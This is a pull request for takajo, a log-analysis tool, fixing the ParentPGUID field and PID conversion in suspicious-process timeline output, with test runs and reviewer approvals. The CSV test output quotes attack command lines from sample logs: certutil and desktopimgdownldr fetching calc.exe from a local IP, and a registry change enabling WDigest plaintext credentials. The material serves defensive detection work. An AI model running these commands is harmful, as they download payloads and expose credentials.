fix: Fixed key to ParentPGUID. Apply PID hex conversion process only if PID is not decimal

[fukusuket]

What Changed

• Fixed [bug] PID and ParentPGUID are not output in timeline-suspicious-process csv output #49
  • Changed key ParentGUID to ParentPGUID
  • Apply PID hex conversion process only if PID is not decimal
    • related feat: add HexToDecimal field data mapping hayabusa#1154

Test

Environment

• OS: macOS Sonoma version 14.0

% nim -v
Nim Compiler Version 2.0.0 [MacOSX: amd64]
% nimble -v
nimble v0.14.2 compiled at 2023-08-19 16:19:52

Test1(default jsonl)

% ./takajo timeline-suspicious-processes -t timeline.jsonl -o result.csv

Event ID 4688 Security
PID 1216 and 1404 are output.
4688 does not have ParentPGUID, so it is not output.

% cat result.csv | head -n 5
Timestamp,Computer,Type,Level,Rule,RuleAuthor,Cmdline,Process,PID,User,LID,LGUID,ProcessGUID,ParentCmdline,ParentPID,ParentPGUID,Description,Product,Company,MD5 Hash,SHA1 Hash,SHA256 Hash,Import Hash
2016-08-19 04:59:33.255 +09:00,IE10Win7,Security 4688,high,Rundll32 Execution Without DLL File,,rundll32.exe,C:\Windows\System32\rundll32.exe,1216,IE10WIN7$,0x3e7,,,,,,,,,,,,,
2016-08-19 04:59:33.255 +09:00,IE10Win7,Security 4688,high,Rundll32 Execution Without Parameters,,rundll32.exe,C:\Windows\System32\rundll32.exe,1216,IE10WIN7$,0x3e7,,,,,,,,,,,,,
2016-08-19 04:59:33.255 +09:00,IE10Win7,Security 4688,high,Bad Opsec Defaults Sacrificial Processes With Improper Arguments,,rundll32.exe,C:\Windows\System32\rundll32.exe,1216,IE10WIN7$,0x3e7,,,,,,,,,,,,,
2016-08-19 05:03:18.175 +09:00,IE10Win7,Security 4688,high,Privilege Escalation via Named Pipe Impersonation,,cmd.exe /c echo yagfag > \\.\pipe\yagfag,C:\Windows\System32\cmd.exe,1404,IE10WIN7$,0x3e7,,,,,,,,,,,,,

Event ID 1 Sysmon
PID 1524 and 8636 and 60 are output.
ParentPGUID A57649D1-124E-61F1-503D-8E1500000000 and 3E153517-43C6-630C-F202-000000000400 and 3E153517-4EE4-630C-BA00-000000000500 are output.

% cat result.csv | tail -n 5
2022-01-26 18:20:49.101 +09:00,fs03vuln.offsec.lan,Sysmon 1,high,Reg Add Suspicious Paths,,reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1,C:\Windows\System32\reg.exe,1524,OFFSEC\admmig,0x1586d8b2,A57649D1-1238-61F1-B2D8-861500000000,A57649D1-1271-61F1-315A-8E1500000000,"""C:\Windows\system32\cmd.exe"" """,4924,A57649D1-124E-61F1-503D-8E1500000000,Registry Console Tool,Microsoft® Windows® Operating System,Microsoft Corporation,A3F446F1E2B8C6ECE56F608FB32B8DC6,0873F40DE395DE017495ED5C7E693AFB55E9F867,849F54DC526EA18D59ABAF4904CB11BC15B982D2952B971F2E1B6FBF8C974B39,A069A88BBB8016324D7EC0A0EEC459EB,
2022-08-29 13:43:48.015 +09:00,DESKTOP-VQBONAV,Sysmon 1,high,Suspicious File Downloaded From Direct IP Via Certutil.EXE,,"""C:\Windows\system32\certutil.exe"" -urlcache -split -f http://192.168.158.128:8000/calc.exe C:\Users\user\Desktop\calc.exe""",C:\Windows\System32\certutil.exe,8636,DESKTOP-VQBONAV\user,0x1623e,3E153517-1483-630C-3E62-010000000000,3E153517-4404-630C-0003-000000000400,"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" """,8960,3E153517-43C6-630C-F202-000000000400,CertUtil.exe,Microsoft® Windows® Operating System,Microsoft Corporation,DE9C75F34F47B60A71BBA03760F0579E,0873F40DE395DE017495ED5C7E693AFB55E9F867,12F06D3B1601004DB3F7F1A07E7D3AF4CC838E890E0FF50C51E4A0C9366719ED,336674CB3C8337BDE2C22255345BFF43,
2022-08-29 13:43:48.015 +09:00,DESKTOP-VQBONAV,Sysmon 1,high,Potentially Suspicious PowerShell Child Processes,,"""C:\Windows\system32\certutil.exe"" -urlcache -split -f http://192.168.158.128:8000/calc.exe C:\Users\user\Desktop\calc.exe""",C:\Windows\System32\certutil.exe,8636,DESKTOP-VQBONAV\user,0x1623e,3E153517-1483-630C-3E62-010000000000,3E153517-4404-630C-0003-000000000400,"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" """,8960,3E153517-43C6-630C-F202-000000000400,CertUtil.exe,Microsoft® Windows® Operating System,Microsoft Corporation,DE9C75F34F47B60A71BBA03760F0579E,0873F40DE395DE017495ED5C7E693AFB55E9F867,12F06D3B1601004DB3F7F1A07E7D3AF4CC838E890E0FF50C51E4A0C9366719ED,336674CB3C8337BDE2C22255345BFF43,
2022-08-29 13:43:48.015 +09:00,DESKTOP-VQBONAV,Sysmon 1,high,Windows Shell/Scripting Processes Spawning Suspicious Programs,,"""C:\Windows\system32\certutil.exe"" -urlcache -split -f http://192.168.158.128:8000/calc.exe C:\Users\user\Desktop\calc.exe""",C:\Windows\System32\certutil.exe,8636,DESKTOP-VQBONAV\user,0x1623e,3E153517-1483-630C-3E62-010000000000,3E153517-4404-630C-0003-000000000400,"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" """,8960,3E153517-43C6-630C-F202-000000000400,CertUtil.exe,Microsoft® Windows® Operating System,Microsoft Corporation,DE9C75F34F47B60A71BBA03760F0579E,0873F40DE395DE017495ED5C7E693AFB55E9F867,12F06D3B1601004DB3F7F1A07E7D3AF4CC838E890E0FF50C51E4A0C9366719ED,336674CB3C8337BDE2C22255345BFF43,
2022-08-29 14:35:43.195 +09:00,DESKTOP-VQBONAV,Sysmon 1,high,Suspicious Desktopimgdownldr Command,,"""C:\Windows\system32\desktopimgdownldr.exe"" /lockscreenurl:http://192.168.158.128:8000/calc.exe /eventName:desktopimgdownldr""",C:\Windows\System32\desktopimgdownldr.exe,60,DESKTOP-VQBONAV\user,0x6addb,3E153517-4E00-630C-DBAD-060000000000,3E153517-502F-630C-DB00-000000000500,"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" """,312,3E153517-4EE4-630C-BA00-000000000500,desktopimgdownldr.exe,Microsoft® Windows® Operating System,Microsoft Corporation,0E8109FF251EE8C467F3F3641A2AFDDB,0873F40DE395DE017495ED5C7E693AFB55E9F867,AAADA36880E08C0B37ED6A1F6FF605144C650D987C0F8049347E9DD5A04CDB4E,F8D617766CF1026390A712DFC1AE2EDA,

Test2(-F, --no-field-data-mapping jsonl)

% ./takajo timeline-suspicious-processes -t timeline-F.jsonl -o result.csv

Event ID 4688 Security
PID 1216 and 1404 are output.
4688 does not have ParentPGUID, so it is not output.

% cat result.csv | head -n 5
Timestamp,Computer,Type,Level,Rule,RuleAuthor,Cmdline,Process,PID,User,LID,LGUID,ProcessGUID,ParentCmdline,ParentPID,ParentPGUID,Description,Product,Company,MD5 Hash,SHA1 Hash,SHA256 Hash,Import Hash
2016-08-19 04:59:33.255 +09:00,IE10Win7,Security 4688,high,Rundll32 Execution Without DLL File,,rundll32.exe,C:\Windows\System32\rundll32.exe,1216,IE10WIN7$,0x3e7,,,,,,,,,,,,,
2016-08-19 04:59:33.255 +09:00,IE10Win7,Security 4688,high,Rundll32 Execution Without Parameters,,rundll32.exe,C:\Windows\System32\rundll32.exe,1216,IE10WIN7$,0x3e7,,,,,,,,,,,,,
2016-08-19 04:59:33.255 +09:00,IE10Win7,Security 4688,high,Bad Opsec Defaults Sacrificial Processes With Improper Arguments,,rundll32.exe,C:\Windows\System32\rundll32.exe,1216,IE10WIN7$,0x3e7,,,,,,,,,,,,,
2016-08-19 05:03:18.175 +09:00,IE10Win7,Security 4688,high,Privilege Escalation via Named Pipe Impersonation,,cmd.exe /c echo yagfag > \\.\pipe\yagfag,C:\Windows\System32\cmd.exe,1404,IE10WIN7$,0x3e7,,,,,,,,,,,,,

Event ID 1 Sysmon
PID 1524 and 8636 and 60 are output.
ParentPGUID A57649D1-124E-61F1-503D-8E1500000000 and 3E153517-43C6-630C-F202-000000000400 and 3E153517-4EE4-630C-BA00-000000000500 are output.

% cat result.csv | tail -n 5
2022-01-26 18:20:49.101 +09:00,fs03vuln.offsec.lan,Sysmon 1,high,Reg Add Suspicious Paths,,reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1,C:\Windows\System32\reg.exe,1524,OFFSEC\admmig,0x1586d8b2,A57649D1-1238-61F1-B2D8-861500000000,A57649D1-1271-61F1-315A-8E1500000000,"""C:\Windows\system32\cmd.exe"" """,4924,A57649D1-124E-61F1-503D-8E1500000000,Registry Console Tool,Microsoft® Windows® Operating System,Microsoft Corporation,A3F446F1E2B8C6ECE56F608FB32B8DC6,0873F40DE395DE017495ED5C7E693AFB55E9F867,849F54DC526EA18D59ABAF4904CB11BC15B982D2952B971F2E1B6FBF8C974B39,A069A88BBB8016324D7EC0A0EEC459EB,
2022-08-29 13:43:48.015 +09:00,DESKTOP-VQBONAV,Sysmon 1,high,Suspicious File Downloaded From Direct IP Via Certutil.EXE,,"""C:\Windows\system32\certutil.exe"" -urlcache -split -f http://192.168.158.128:8000/calc.exe C:\Users\user\Desktop\calc.exe""",C:\Windows\System32\certutil.exe,8636,DESKTOP-VQBONAV\user,0x1623e,3E153517-1483-630C-3E62-010000000000,3E153517-4404-630C-0003-000000000400,"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" """,8960,3E153517-43C6-630C-F202-000000000400,CertUtil.exe,Microsoft® Windows® Operating System,Microsoft Corporation,DE9C75F34F47B60A71BBA03760F0579E,0873F40DE395DE017495ED5C7E693AFB55E9F867,12F06D3B1601004DB3F7F1A07E7D3AF4CC838E890E0FF50C51E4A0C9366719ED,336674CB3C8337BDE2C22255345BFF43,
2022-08-29 13:43:48.015 +09:00,DESKTOP-VQBONAV,Sysmon 1,high,Potentially Suspicious PowerShell Child Processes,,"""C:\Windows\system32\certutil.exe"" -urlcache -split -f http://192.168.158.128:8000/calc.exe C:\Users\user\Desktop\calc.exe""",C:\Windows\System32\certutil.exe,8636,DESKTOP-VQBONAV\user,0x1623e,3E153517-1483-630C-3E62-010000000000,3E153517-4404-630C-0003-000000000400,"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" """,8960,3E153517-43C6-630C-F202-000000000400,CertUtil.exe,Microsoft® Windows® Operating System,Microsoft Corporation,DE9C75F34F47B60A71BBA03760F0579E,0873F40DE395DE017495ED5C7E693AFB55E9F867,12F06D3B1601004DB3F7F1A07E7D3AF4CC838E890E0FF50C51E4A0C9366719ED,336674CB3C8337BDE2C22255345BFF43,
2022-08-29 13:43:48.015 +09:00,DESKTOP-VQBONAV,Sysmon 1,high,Windows Shell/Scripting Processes Spawning Suspicious Programs,,"""C:\Windows\system32\certutil.exe"" -urlcache -split -f http://192.168.158.128:8000/calc.exe C:\Users\user\Desktop\calc.exe""",C:\Windows\System32\certutil.exe,8636,DESKTOP-VQBONAV\user,0x1623e,3E153517-1483-630C-3E62-010000000000,3E153517-4404-630C-0003-000000000400,"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" """,8960,3E153517-43C6-630C-F202-000000000400,CertUtil.exe,Microsoft® Windows® Operating System,Microsoft Corporation,DE9C75F34F47B60A71BBA03760F0579E,0873F40DE395DE017495ED5C7E693AFB55E9F867,12F06D3B1601004DB3F7F1A07E7D3AF4CC838E890E0FF50C51E4A0C9366719ED,336674CB3C8337BDE2C22255345BFF43,
2022-08-29 14:35:43.195 +09:00,DESKTOP-VQBONAV,Sysmon 1,high,Suspicious Desktopimgdownldr Command,,"""C:\Windows\system32\desktopimgdownldr.exe"" /lockscreenurl:http://192.168.158.128:8000/calc.exe /eventName:desktopimgdownldr""",C:\Windows\System32\desktopimgdownldr.exe,60,DESKTOP-VQBONAV\user,0x6addb,3E153517-4E00-630C-DBAD-060000000000,3E153517-502F-630C-DB00-000000000500,"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" """,312,3E153517-4EE4-630C-BA00-000000000500,desktopimgdownldr.exe,Microsoft® Windows® Operating System,Microsoft Corporation,0E8109FF251EE8C467F3F3641A2AFDDB,0873F40DE395DE017495ED5C7E693AFB55E9F867,AAADA36880E08C0B37ED6A1F6FF605144C650D987C0F8049347E9DD5A04CDB4E,F8D617766CF1026390A712DFC1AE2EDA,

I would appreciate it if you could review when you have time🙏

[YamatoSecurity]

@fukusuket LGTM! Thanks so much!

[hitenkoku]

Thanks for your pull request.
LGTM.